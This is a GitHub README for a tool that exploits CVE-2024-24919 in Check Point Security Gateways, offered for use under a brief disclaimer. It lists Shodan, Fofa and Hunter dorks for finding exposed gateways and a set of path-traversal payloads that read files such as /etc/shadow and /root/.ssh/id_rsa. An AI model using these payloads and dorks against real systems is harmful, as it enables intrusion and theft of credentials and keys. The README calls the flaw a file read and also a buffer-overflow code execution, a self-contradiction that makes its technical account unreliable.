/CVE-2024-24919

CVE-2024-24919 exploit

Primary LanguagePython

Check Point Security Gateway RCE Exploit Tool (CVE-2024-24919)

Overview

This repository contains a tool for exploiting the CVE-2024-24919 vulnerability in Check Point Security Gateways. The tool is a multi-scanner that can identify vulnerable devices and a single-target exploit that can take full control of the affected device.

CVE-2024-24919 is a high-severity information disclosure vulnerability that allows an attacker to remotely read arbitrary files on a Check Point Security Gateway. This vulnerability can be exploited to steal sensitive information, such as passwords and configuration files.

Disclaimer:

This tool is provided for educational purposes only. It should not be used to attack vulnerable systems without the explicit consent of the owner. The authors of this tool are not responsible for any damages that may result from its use.

How it works

The exploit works by sending a specially crafted HTTP request to the vulnerable device. The request triggers a buffer overflow in the device's firmware, which allows the attacker to execute arbitrary code. The exploit can then be used to take full control of the device.

Requirements

  • Python 3
  • colorama
  • requests

Installation

git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt

Usage

You can scan singel target or multi!

python cve-2024-24919.py

**Dorks **

# Hunter
Hunter: /product.name="Check Point SSL Network Extender"

# Shodan
SHODAN: http.title="Check Point SSL Network Extender"

# Fofa Query
FOFA: title="Check Point SSL Network Extender"

** Tool ScreenShot **

ss

$ Tool paths : ```

    'aCSHELL/../../../../../../../../../../../etc/passwd',
    
    'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
    
    'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
    
    'aCSHELL/../../../../../../../../../../../var/log/syslog',
    
    'aCSHELL/../../../../../../../../../../../var/log/auth.log',
    
    #'aCSHELL/../../../../../../../../../../../var/log/messages',
    
    'aCSHELL/../../../../../../../../../../../etc/group',
    
    'aCSHELL/../../../../../../../../../../../etc/shadow',
    
    'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
    
    'aCSHELL/../../../../../../../../../../../etc/hostname',
    
    'aCSHELL/../../../../../../../../../../../etc/hosts',
    
    'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```